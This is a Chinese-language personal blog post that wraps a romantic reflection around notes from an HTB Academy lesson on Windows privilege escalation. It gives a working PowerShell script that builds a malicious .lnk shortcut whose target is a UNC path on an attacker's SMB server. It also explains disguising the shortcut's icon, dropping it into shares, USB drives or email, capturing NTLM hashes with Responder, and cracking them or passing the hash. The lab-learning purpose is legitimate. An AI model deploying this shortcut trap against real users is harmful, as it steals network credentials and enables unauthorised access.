喜歡一個人,是否只是因為—
「在他/她身上,看見了自己渴望成為的樣子?」
當我看見他的安靜專注、直接、勇敢和真實(或者,那種可以精準用 exploit 爆擊的樣子),
心裡就會產生一種奇怪的迷戀。
那感覺就像點擊了一個 .lnk
,
它偽裝成再普通不過的捷徑,
卻在一瞬間把我送進了最深的核心。
我開始懷疑...
這條路徑指向的不只是他,
而是那個我渴望成為的未來版本的自己。
Hashtag: #所以,該下船了嗎?
.lnk 檔是一個「Windows 快捷方式」。
在捷徑裡,我們可以指定 TargetPath,這個路徑可以是本機程式,也可以是網路 UNC 路徑(例如 \192.168.1.100\share\icon.png)。
當使用者「瀏覽」這個捷徑檔時 ...
Explorer 會嘗試載入它 → 去訪問那個 UNC 路徑 → 就會自動送出 NTLM 驗證請求。
我們先架設一個伺服器(例如用 Responder 監聽 SMB)。
製作一個指向 \... 的 .lnk。
把這個 .lnk 丟到受害者能看到的地方(桌面、共享資料夾、Email 附件等)。
只要他一打開資料夾,不用點捷徑,就會嘗試存取那個圖示或目標路徑。
NTLM hash 流到我們這裡,就能抓取或暴力破解。
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\10.10.14.1\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "只要瀏覽存放此檔案的目錄,就會觸發一個驗證請求。"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
解釋:
TargetPath 指向我們的伺服器,所以可以把 10.10.14.1 換成你的 attackerIP。
IconLocation 給它一個正常的圖,不要太可疑。
存檔 → 丟給目標。
Lnkbomb:自動化幫我們生成很多 .lnk,省得手寫。
Responder / Inveigh:用來接收並記錄目標傳回的 NTLM hash。
如果發現 .scf 無法用了(Server 2019 / Windows 10+),就試試 .lnk。
放到共享資料夾、USB等,讓目標不小心打開。
其實這就是被動 hash 捕獲技術
,通常下一步是:
離線破解 hash(用 hashcat)或 Pass-the-Hash。
# 其實說實話,你喜歡誰已經不太重要了 XD
# 不過,未來的故事誰知道呢?
HTB Academy - Windows Privilege Escalation - Interacting with Users:
https://academy.hackthebox.com/module/67/section/630